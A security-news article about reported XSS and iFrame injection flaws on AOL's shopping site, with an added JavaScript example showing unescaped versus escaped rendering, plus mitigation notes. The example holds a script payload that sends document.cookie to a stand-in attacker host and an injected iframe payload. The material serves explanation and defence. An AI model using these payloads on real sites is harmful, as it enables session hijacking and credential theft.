Indian security researcher Deepanker Verma claims to have uncovered cross-site scripting (XSS) and iFrame injection vulnerabilities on the shopping website of AOL.
According to the expert, cybercriminals could leverage these flaws to steal user cookies and hijack sessions.
To demonstrate the fact that iFrames can be injected into the AOL Shopping website, Verma has added an iFrame that points to his own site (see screenshot).
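The two findings come down to the same root cause: an attacker-controlled value is written into AOL's page without HTML escaping, so a `<iframe>` or `<script>` tag supplied by the attacker is rendered as markup rather than as text. The snippet below is an added illustration, not code from AOL's site or from the researcher's write-up; the page renderer, the `attacker.example` host and the payload strings are assumptions constructed for the example. It shows the vulnerable concatenation next to an escaped version and checks whether each payload survives as a live tag.

```javascript
// Added example (not AOL's or the researcher's code): a minimal shopping-search
// page renderer showing the reflected-injection pattern described above, beside
// a hardened version. Function names, host and payloads are assumptions.

// Escape the five characters that can change HTML structure or break out of an attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the search term is concatenated straight into the HTML body.
function renderSearchPageVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Hardened: the same page with the untrusted value HTML-escaped before insertion.
function renderSearchPageSafe(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Constructed payloads modelling the two findings: an injected frame pointing at an
// attacker-controlled host, and a script that ships document.cookie to that host.
const IFRAME_PAYLOAD = '<iframe src="https://attacker.example/"></iframe>';
const COOKIE_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+encodeURIComponent(document.cookie)</script>';

// Does the rendered page contain a live (unescaped) opening tag of this name?
function containsLiveTag(html, tagName) {
  return new RegExp(`<${tagName}[\\s>]`, "i").test(html);
}

// Run both payloads through both renderers and report which ones survive as markup.
function demo() {
  const results = {};
  const payloads = { iframe: IFRAME_PAYLOAD, script: COOKIE_PAYLOAD };
  for (const [tag, payload] of Object.entries(payloads)) {
    results[tag] = {
      vulnerable: containsLiveTag(renderSearchPageVulnerable(payload), tag),
      safe: containsLiveTag(renderSearchPageSafe(payload), tag),
    };
  }
  return results;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Two caveats worth keeping in mind when reading the researcher's cookie-theft claim: a session cookie flagged `HttpOnly` is not readable through `document.cookie`, which blunts the script payload but does nothing against the injected frame, which can still show a convincing login form under AOL's own domain; and `X-Frame-Options` or `frame-ancestors` do not help here either, since they stop AOL's page from being framed elsewhere, not AOL's page from framing an attacker's site. Output escaping at the point of insertion (plus a Content-Security-Policy restricting `script-src` and `frame-src`) is the fix for both.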
“This is a popular shopping website with millions of users. An attacker can trick innocent users and use this vulnerability for malicious tasks,” the researcher wrote on Hacking Tricks.
The expert says that the vulnerabilities have been reported to AOL, but so far they haven’t responded to his notifications.
Update. According to security researcher Suriya Prakash, AOL doesn't handle vulnerability reports too well.
He says that the company still hasn't addressed the XSS issues he reported to them a few months ago.
Moreover, it turns out that a security hole similar to the one identified by Verma was found by the TeamHav0k hacker group almost one year ago.